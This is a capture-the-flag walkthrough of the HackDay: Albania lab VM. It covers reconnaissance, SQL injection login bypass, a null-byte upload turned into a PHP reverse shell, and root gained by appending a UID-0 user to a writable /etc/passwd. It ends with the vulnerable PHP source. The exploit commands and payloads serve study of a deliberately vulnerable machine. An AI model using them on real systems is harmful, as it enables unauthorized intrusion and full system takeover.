[VULNHUB] HackDay: Albania

The HackDay: Albania is a really interesting VM where I lernt a few new things about SQLi and PHP.

TOO MUCH DIRECTORIES

First of all scan the available ports of the target:

nmap 192.168.1.19 -sV -p 1-65535

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-21 09:24 CET
Nmap scan report for 192.168.1.19
Host is up (0.013s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.20 seconds

So there is an SSH service and an HTTP one.
Before browsing to http://192.168.1.19:8008 let’s grab some infos from nikto:

nikto -h 192.168.1.19 -p 8008

I discovered that there are lot of entries into /robots.txt file so I opened it:

Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

Opening a few of them will appear the same image which says that it is not the correct directory. So I used curl with a for to discover which folder was correct. First of all I created a .txt file with folder names one per line without slashes then I created a script:

IFS=$'\n'       
for j in $(cat list.txt)
do
    printf "Testing $j folder...\n\n"
    curl -L http://192.168.1.19:8008/$j
    printf "\n\n"
done

On the terminal output I found a different HTML source code:

Testing unisxcudkqjydw folder...

IS there any /vulnbank/ in there ???

BINGO!

THIS BANK IS NOT SO SECURE

Browse to http://192.168.1.19/unisxcudkqjydw/vulnbank and I discovered that directory listing is active and there is only a folder (client) so I clicked on it and Very Secure Bank website appeared. There is a login form, I tried some SQLi techniques, so I putted a single quote char and an error occurred:

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102

Ok, seems to be vulnerable to SQLi. Now I spent lot of time finding the right pattern, I tried OR, AND, UNION without success. After some hours the idea, I used the comment to ignore the rest of the query like this:

user' #

I used the # because — comment returns an error while with the # I got only “Invalid Credentials…”. Now I bruteforced the username with Burpsuite. I captured the POST request and I used Intruder to achieve that with the following payload:

POST /unisxcudkqjydw/vulnbank/client/login.php HTTP/1.1
Host: 192.168.1.19:8008
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.19:8008/unisxcudkqjydw/vulnbank/client/login.php
Cookie: PHPSESSID=cfg95pqu6gukj980niqriu7uq0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

username=§user§' #&password=something

I used rockyou as wordlist ans after some time I discovered that jeff’ # worked. I logged with this string into the username field and the bank homepage of the user appeared. THere is an upload form for tickets where I can upload images. First of all I tried with a .gif but the page returned an error:

After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc...

So I tried with a .php%00.jpg using null byte and the image was succesfully uploaded. I clicked on the last ticket created and then on the image blank thumb but an error occurred:

Warning: include(): Failed opening 'upload/php-reverse-shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/unisxcudkqjydw/vulnbank/client/view_file.php on line 13

There is an include error, maybe there is an include function into the PHP code? If that is true I can upload a simple .jpg file with the php code inside and it will even interpreted as PHP. Let’s try. I used this reverse shell. The upload was successful: I started listen locally:

nc -lvp 1234

Then I opened the last ticket again and I got the reverse shell!

PAY ATTENTION TO SENSITIVE FILES, DEAR SYSADMIN

Now I need a TTY but python seems to be not installed but before I surrender let’s do some research:

find / -name "python*" 2>/dev/null

I found that there is python3 into /usr/bin/ folder, so I typed:

/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'

Now I have a TTY. I need to escalate privileges now. I found only an user into /home folder but is useless then I tried to search some files with bad permissions:

find / -writable -type f 2>/dev/null

And the first result was /etc/passwd file! So I copied the content locally and now I can add a new user. I need to generate an hashed password too because the new security policy of Linux doesn’t allow an user without a password:

openssl passwd -1

I used “test” as password and now I can add a new line into the passwd file:

test:$1$owFfBsc7$w1wg1/M40pBlbFVMBT2w61:0:0:test:/root:/bin/bash

Notice that I setted UID and GID to 0. Now I saved the file and I encoded it in base64:

cat passwd | base64 -w 0

Now I copied the base64 string and I typed this into the reverse shell:

echo "BASE64_STRING" | base64 -d > /etc/passwd

I omitted the base64 string because it was so long. Now verify that the file was overwritten:

cat /etc/passwd

This is the output:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
test:$1$owFfBsc7$w1wg1/M40pBlbFVMBT2w61:0:0:test:/root:/bin/bash

Now just log as test user:

su - test

And now we are logged in as root! List the file and you will find the flag:

cat flag.txt

Finished!

CONCLUSION

This is the source code of config.php, in particular focus on these strings:

function check_login($username,$password){
    
    $username = str_ireplace("OR", "", $username);
    $username = str_ireplace("UNION", "", $username);
    $username = str_ireplace("AND", "", $username);
    $password = str_ireplace("'","",$password);
    $sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
    $result = mysqli_fetch_assoc(execute_query($sql_query));
    $result = $result["ID"];
    if($result >= 1) {
    return $result;
    } else {
        return -1;
    }   
}

The strings OR, UNION, AND are filtered on the username field while the single quote is filtered in the password field. That’s why we used user’ # string. Also check out the view_file.php:

$klient_id = $_SESSION["id"];
$filename = $_GET["filename"];
if(endsWith($filename , ".jpg") || endsWith($filename , ".png") || endsWith($filename , ".jpeg") || endsWith($filename , ".bmp")) {
    include("upload/" . $_GET["filename"]);
    } else {
        echo "Only images are allowed to get included. We hate hackers.";
    }
}

This code checks only if the extension is .jpg, .png or .jpeg, if that is true it includes the file and execute it even if it has not .php extension.

Advertisements
[VULNHUB] HackDay: Albania

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s